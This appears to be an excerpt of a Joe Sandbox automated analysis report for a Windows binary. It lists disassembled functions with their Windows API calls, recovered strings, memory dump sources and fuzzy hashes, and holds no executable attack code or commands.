                                            Function 00E72F86 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00E2FEC6: _wcscpy.LIBCMT ref: 00E2FEE9
                                            • _memset.LIBCMT ref: 00E73077
                                            • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00E730A6
                                            • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00E73159
                                            • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00E73187
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: ItemMenu$Info$Default_memset_wcscpy
                                            • String ID: 0
                                            • API String ID: 4152858687-4108050209
                                            • Opcode ID: f3b941d7d7b5cd24af3392f61b0c249a5bb48dc393a8c66462e09a6f1bf75ebb
                                            • Instruction ID: 96862a9380f83c39dbb81016ac2eb9afa60b7bf03a2cf7dfe7531dfbb6f49b56
                                            • Opcode Fuzzy Hash: f3b941d7d7b5cd24af3392f61b0c249a5bb48dc393a8c66462e09a6f1bf75ebb
                                            • Instruction Fuzzy Hash: 2F51E43160A3009ED7659F38D845A6BBBE4EF85314F44AA2EF889F3191DB70CE44E752
                                            Function 00E72C42 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • _memset.LIBCMT ref: 00E72CAF
                                            • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00E72CCB
                                            • DeleteMenu.USER32(?,00000007,00000000), ref: 00E72D11
                                            • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00ED6890,00000000), ref: 00E72D5A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Menu$Delete$InfoItem_memset
                                            • String ID: 0
                                            • API String ID: 1173514356-4108050209
                                            • Opcode ID: 42234d5ddebf23662869167e61807a702a812dc4133f8822c15e1243d11acc74
                                            • Instruction ID: d4df7872bccf8fe09144812c199e26213d28ba0e437c0a99ad3f9666e5575c7b
                                            • Opcode Fuzzy Hash: 42234d5ddebf23662869167e61807a702a812dc4133f8822c15e1243d11acc74
                                            • Instruction Fuzzy Hash: FC4191302043019FD724DF24C845B5ABBE8EF85324F14965EFA69E72D1D770E905CB92
                                            Function 00E8DAB9 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON
                                            Download Yara Rule
                                            APIs
                                            • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00E8DAD9
                                              • Part of subcall function 00E179AB: _memmove.LIBCMT ref: 00E179F9
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: BuffCharLower_memmove
                                            • String ID: cdecl$none$stdcall$winapi
                                            • API String ID: 3425801089-567219261
                                            • Opcode ID: d4f96799907b41964e8b45dce3a0256d19f55923df2abda13b6ba209711a3786
                                            • Instruction ID: 517c158304f4185ff6a4bfffe35be2c71a6193ff82ffb581a536e3c211db8782
                                            • Opcode Fuzzy Hash: d4f96799907b41964e8b45dce3a0256d19f55923df2abda13b6ba209711a3786
                                            • Instruction Fuzzy Hash: 79317A7150421AABCB10EF54CC819EEB7F4FF45324F109A2AE869B76D1CB31A946CB80
                                            Function 00E69372 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00E17F41: _memmove.LIBCMT ref: 00E17F82
                                              • Part of subcall function 00E6B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00E6B0E7
                                            • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00E693F6
                                            • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00E69409
                                            • SendMessageW.USER32(?,00000189,?,00000000), ref: 00E69439
                                              • Part of subcall function 00E17D2C: _memmove.LIBCMT ref: 00E17D66
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: MessageSend$_memmove$ClassName
                                            • String ID: ComboBox$ListBox
                                            • API String ID: 365058703-1403004172
                                            • Opcode ID: 0b5a749d394b5905a56f37b774041b61f50919a871e5e22d57974030a380f8fa
                                            • Instruction ID: df46eae985701df24634139b3e47403a11276e3547cc5cb15a6be9576a9bad47
                                            • Opcode Fuzzy Hash: 0b5a749d394b5905a56f37b774041b61f50919a871e5e22d57974030a380f8fa
                                            • Instruction Fuzzy Hash: A421E671A80204BEDB14ABB0EC85DFFB7BCDF45790B10611AF825B72E2DF35094A9620
                                            Function 00E96656 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00E11D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00E11D73
                                              • Part of subcall function 00E11D35: GetStockObject.GDI32(00000011), ref: 00E11D87
                                              • Part of subcall function 00E11D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E11D91
                                            • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00E966D0
                                            • LoadLibraryW.KERNEL32(?), ref: 00E966D7
                                            • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00E966EC
                                            • DestroyWindow.USER32(?), ref: 00E966F4
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                            • String ID: SysAnimate32
                                            • API String ID: 4146253029-1011021900
                                            • Opcode ID: 8c7b09efaa81c9a2d37ba10d58feccd7ae6f7ef32df2dc269a9941546af8f97c
                                            • Instruction ID: a3ac5dd3bb26dea8843a6d5b31b871f27803899ff1e84c5dd57e542b14f9c9a5
                                            • Opcode Fuzzy Hash: 8c7b09efaa81c9a2d37ba10d58feccd7ae6f7ef32df2dc269a9941546af8f97c
                                            • Instruction Fuzzy Hash: 43219DB1200206AFEF104FA4EC80EBB37ADEB59368F10662BF911F2191D771CC919760
                                            Function 00E7703E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetStdHandle.KERNEL32(0000000C), ref: 00E7705E
                                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00E77091
                                            • GetStdHandle.KERNEL32(0000000C), ref: 00E770A3
                                            • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00E770DD
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: CreateHandle$FilePipe
                                            • String ID: nul
                                            • API String ID: 4209266947-2873401336
                                            • Opcode ID: a83dbeea928aacb31eeab08721b288a91bb3cf442e42e42739fd3de620be00e2
                                            • Instruction ID: 6f636faf2503a74d2a748f9846703e45f0360dc26bbf5a48dc3a4cd1cab67fa6
                                            • Opcode Fuzzy Hash: a83dbeea928aacb31eeab08721b288a91bb3cf442e42e42739fd3de620be00e2
                                            • Instruction Fuzzy Hash: E1214F74604209ABDF209F39DC05A9A77A8BF44728F20962AF8E5E72D0D77199508B50
                                            Function 00E7710C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetStdHandle.KERNEL32(000000F6), ref: 00E7712B
                                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00E7715D
                                            • GetStdHandle.KERNEL32(000000F6), ref: 00E7716E
                                            • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00E771A8
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: CreateHandle$FilePipe
                                            • String ID: nul
                                            • API String ID: 4209266947-2873401336
                                            • Opcode ID: cc7848c44ae0eb3161382a697671d012d20e638bc0e6e0ac9f52f9bca282d08c
                                            • Instruction ID: cd6472f91090ad864f6e7d649f2b516925f23abcbddcd5161b9f6df281880cef
                                            • Opcode Fuzzy Hash: cc7848c44ae0eb3161382a697671d012d20e638bc0e6e0ac9f52f9bca282d08c
                                            • Instruction Fuzzy Hash: 0A21B3756053059BDF209F699C04AAAB7E8AF55738F60961AFCF4F32D0D7709841CB60
                                            Function 00E7AEAB Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
                                            Download Yara Rule
                                            APIs
                                            • SetErrorMode.KERNEL32(00000001), ref: 00E7AEBF
                                            • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00E7AF13
                                            • __swprintf.LIBCMT ref: 00E7AF2C
                                            • SetErrorMode.KERNEL32(00000000,00000001,00000000,00E9F910), ref: 00E7AF6A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: ErrorMode$InformationVolume__swprintf
                                            • String ID: %lu
                                            • API String ID: 3164766367-685833217
                                            • Opcode ID: baaffab684ed6afa6ff65f1aa646811a9ce10454bec1d821ac42911af7137b11
                                            • Instruction ID: e67d434365862086fc9cfcf18e00a25a1113ad92c340ea4cc24abf7a76cd4dd8
                                            • Opcode Fuzzy Hash: baaffab684ed6afa6ff65f1aa646811a9ce10454bec1d821ac42911af7137b11
                                            • Instruction Fuzzy Hash: EC213231600209AFCB10EB65D985DEE7BF8EF89704B144069F909FB252DB31EA45CB61
                                            Function 00E6A52F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68windowCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00E17D2C: _memmove.LIBCMT ref: 00E17D66
                                              • Part of subcall function 00E6A37C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00E6A399
                                              • Part of subcall function 00E6A37C: GetWindowThreadProcessId.USER32(?,00000000), ref: 00E6A3AC
                                              • Part of subcall function 00E6A37C: GetCurrentThreadId.KERNEL32 ref: 00E6A3B3
                                              • Part of subcall function 00E6A37C: AttachThreadInput.USER32(00000000), ref: 00E6A3BA
                                            • GetFocus.USER32 ref: 00E6A554
                                              • Part of subcall function 00E6A3C5: GetParent.USER32(?), ref: 00E6A3D3
                                            • GetClassNameW.USER32(?,?,00000100), ref: 00E6A59D
                                            • EnumChildWindows.USER32(?,00E6A615), ref: 00E6A5C5
                                            • __swprintf.LIBCMT ref: 00E6A5DF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                            • String ID: %s%d
                                            • API String ID: 1941087503-1110647743
                                            • Opcode ID: b074c41b1b19e020d2a820b8f2fd39a7710c62db9f7d8adce2d30b6e2b920213
                                            • Instruction ID: 6de18557c966b6f16ae9b0038d20341d670254ef8909d052a172b2adb3258f27
                                            • Opcode Fuzzy Hash: b074c41b1b19e020d2a820b8f2fd39a7710c62db9f7d8adce2d30b6e2b920213
                                            • Instruction Fuzzy Hash: F811A271A80308ABDF107FA4EC85FEE77B8AF49744F085076F908BA192CA7099458F75
                                            Function 00E72017 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON
                                            Download Yara Rule
                                            APIs
                                            • CharUpperBuffW.USER32(?,?), ref: 00E72048
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: BuffCharUpper
                                            • String ID: APPEND$EXISTS$KEYS$REMOVE
                                            • API String ID: 3964851224-769500911
                                            • Opcode ID: 2099247cc46acdcecc247e3ce8764f5d70746271efc933cfcf398bb14a781b8d
                                            • Instruction ID: e7e1dcf03b61b6283f898638f363c83ba29d141aa7e00641358c75b0754ff5b8
                                            • Opcode Fuzzy Hash: 2099247cc46acdcecc247e3ce8764f5d70746271efc933cfcf398bb14a781b8d
                                            • Instruction Fuzzy Hash: 751139749001198FCF00EFA4D9519EEB7F4BF55308F54A46DD899B7252EB32690ACB50
                                            Function 00E8EE69 Relevance: 7.7, APIs: 5, Instructions: 247COMMON
                                            Download Yara Rule
                                            APIs
                                            • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00E8EF1B
                                            • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00E8EF4B
                                            • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00E8F07E
                                            • CloseHandle.KERNEL32(?), ref: 00E8F0FF
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                            • String ID:
                                            • API String ID: 2364364464-0
                                            • Opcode ID: 6ce401577382ae1b5a613bf4220d59c90563bcfcf22dd95207b618f4f8faa61e
                                            • Instruction ID: 8a7e00ad59fd89e966db364ab48706f5369ebd608fe3c8ad54b3a77c4ff71568
                                            • Opcode Fuzzy Hash: 6ce401577382ae1b5a613bf4220d59c90563bcfcf22dd95207b618f4f8faa61e
                                            • Instruction Fuzzy Hash: 648152716043019FD720EF28CC96F6AB7E5AF88710F14981DF59AEB392DB70AC448B91
                                            Function 00E902C2 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00E17F41: _memmove.LIBCMT ref: 00E17F82
                                              • Part of subcall function 00E910A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00E90038,?,?), ref: 00E910BC
                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00E90388
                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00E903C7
                                            • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00E9040E
                                            • RegCloseKey.ADVAPI32(?,?), ref: 00E9043A
                                            • RegCloseKey.ADVAPI32(00000000), ref: 00E90447
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                            • String ID:
                                            • API String ID: 3440857362-0
                                            • Opcode ID: 887352747418274b2f7915f09bfec1de76377043497450d6eeaa125d44418f8d
                                            • Instruction ID: 6af8cb1c53250d923710b039bca07a6eafc9fe5508252d446741a1fad939ea9f
                                            • Opcode Fuzzy Hash: 887352747418274b2f7915f09bfec1de76377043497450d6eeaa125d44418f8d
                                            • Instruction Fuzzy Hash: BE515E31208205AFDB04EF54D881EAEB7E9FF84704F44992EF595A7292DB30ED44CB52
                                            Function 00E8DBDC Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00E19997: __itow.LIBCMT ref: 00E199C2
                                              • Part of subcall function 00E19997: __swprintf.LIBCMT ref: 00E19A0C
                                            • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00E8DC3B
                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00E8DCBE
                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00E8DCDA
                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00E8DD1B
                                            • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00E8DD35
                                              • Part of subcall function 00E15B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00E77B20,?,?,00000000), ref: 00E15B8C
                                              • Part of subcall function 00E15B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00E77B20,?,?,00000000,?,?), ref: 00E15BB0
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                            • String ID:
                                            • API String ID: 327935632-0
                                            • Opcode ID: 6cbce38ee0ad87943bc6fe05aa0e4be8e7abc21d85a53bf31a60c73c84fac46f
                                            • Instruction ID: 253f664728ab6521e5b878d43056902ef636d9ab160f8a49239d9c50daf8c2f5
                                            • Opcode Fuzzy Hash: 6cbce38ee0ad87943bc6fe05aa0e4be8e7abc21d85a53bf31a60c73c84fac46f
                                            • Instruction Fuzzy Hash: BC511835A04205DFCB00EF68C8949DDF7F5EF48314B05916AE819BB3A2DB30AD85CB91
                                            Function 00E7E7DC Relevance: 7.6, APIs: 5, Instructions: 135COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00E7E88A
                                            • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00E7E8B3
                                            • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00E7E8F2
                                              • Part of subcall function 00E19997: __itow.LIBCMT ref: 00E199C2
                                              • Part of subcall function 00E19997: __swprintf.LIBCMT ref: 00E19A0C
                                            • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00E7E917
                                            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00E7E91F
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                            • String ID:
                                            • API String ID: 1389676194-0
                                            • Opcode ID: c0a172461f9a511e89e14e3e002dc19e7addc7bcc9e9092d21a2b843ff6d7a61
                                            • Instruction ID: 3450a2e21067ebc57f0104e64011481fa1ec9b60ab8f946c6f1e56a8829d102c
                                            • Opcode Fuzzy Hash: c0a172461f9a511e89e14e3e002dc19e7addc7bcc9e9092d21a2b843ff6d7a61
                                            • Instruction Fuzzy Hash: 8B511A35A00205DFCB05EF64C991AAEBBF5EF4C314B149099E84ABB362CB31ED51DB51
                                            Function 00E9A2C5 Relevance: 7.6, APIs: 5, Instructions: 130COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 82c959d7165ef479e61f56205c003fb248b8fb442fef85cecd2d2e4ef420615e
